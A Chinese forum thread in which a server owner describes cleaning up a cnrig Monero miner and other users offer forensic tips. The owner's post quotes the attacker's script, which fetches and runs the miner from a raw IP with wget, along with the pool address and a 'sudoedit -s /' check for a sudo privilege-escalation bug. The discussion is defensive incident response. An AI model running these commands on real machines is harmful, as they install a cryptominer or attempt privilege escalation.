nisekoi 大佬有话说 :
【已查杀】LINUX中毒了怎么杀啊。
本帖最后由 nisekoi 于 2021-2-1 10:25 编辑
找到二进制文件和脚本了,不在root目录下。怪不得之前看到是./运行的却没看到。
原来是debianuser这个用户跑的。当时太着急kill了。都没仔细看
https://i.loli.net/2021/02/01/F9Pjy1NE4ueBDva.png
能不能向矿池举报封它号
"url": "pool.supportxmr.com:3333",
"user": "43hpviAqezAaSKg7g6nTruYUxvdoEbedQQxvAsKEoZbpfWMpwDAbb4tXdPmMYJ1wc4afLFPR5UPVW66Hg6uoXQDf9zyFEYc",
s.sh脚本只有一条命令。wget http://45.130.138.17/cnrig; wget http://45.130.138.17/config.json; chmod 777 *; ./cnrig
应该不用担心进程复活了
————————
更新,疑似是前几天爆出的sudo提权漏洞。
检查了登录记录。是昨天下午通过debianuser 这个用户名进来的
Jan 31 16:14:18 NVMe sshd: Accepted password for debianuser from 205.185.125.189 port 47920 ssh2
Jan 31 16:24:17 NVMe sshd: Accepted password for debianuser from 205.185.125.189 port 42482 ssh2
于是我修改了debianuser用户的密码进去看了sudo的版本
debianuser@NVMe:~$ sudo –version
Sudo version 1.8.27
网上资料
受影响版本
Sudo 1.8.2 – 1.8.31p2
Sudo 1.9.0 – 1.9.5p1
但是我无法复现是为什么?
运行sudoedit -s /
debianuser is not in the sudoers file.This incident will be reported.
————————————————————
今天上号突然多了一个挖矿的进程
叫做cnrig。一直满载CPU几个小时。还好发现的早不然估计要被封机了。
现在临时把进程Kill了。要怎么知道他是咋入侵的呢。估计还有自启啥的
walx1589 大佬有话说 :
等进程复活,然后找到对应目录删掉,启用证书登录,封掉账号密码登录
dabang007 大佬有话说 :
你开放的服务比如http等有漏洞,利用漏洞就可以入侵;之前我机器跑个mqtt的服务,也被门罗币挖矿给入侵过…
大屁股 大佬有话说 :
想想看你都用过什么脚本?很多脚本有些作者加密的
nisekoi 大佬有话说 :
walx1589 大佬有话说 : 2021-2-1 09:41
等进程复活,然后找到对应目录删掉,启用证书登录,封掉账号密码登录
目录就在~./cnrig 我看了这个目录根本没有这个二进制文件
crontab里面检查了没有加料。不知道其他地方有没有什么自启的东西
siyun77 大佬有话说 :
1.看看定时任务
2.看看定时任务里面得脚本内容
3.看看.ssh里面有没有奇怪的东西
4.看看root目录下有没有奇怪的文件
5.看看/tmp目录下有没有奇怪的文件
6.看看爱怪文件里面有没有守护进程id
挖矿脚本一般还是有节操的
nisekoi 大佬有话说 :
dabang007 大佬有话说 : 2021-2-1 09:41
你开放的服务比如http等有漏洞,利用漏洞就可以入侵;之前我机器跑个mqtt的服务,也被门罗币挖矿给入侵过.. …
就跑了一个NGINX(1.19.6) 上面的程序都是些常见的如WP TP DZ之类的。。 mysql redis也没开公网访问。不知道是咋入侵的。
singhighssx 大佬有话说 :
mark
jarvan 大佬有话说 :
siyun77 大佬有话说 : 2021-2-1 09:44
1.看看定时任务
2.看看定时任务里面得脚本内容
3.看看.ssh里面有没有奇怪的东西
没有节操的是什么样的?
siyun77 大佬有话说 :
jarvan 大佬有话说 : 2021-2-1 09:48
没有节操的是什么样的?
1.你不知道你已经中招
2.你知道你已经中招,并且造成严重损失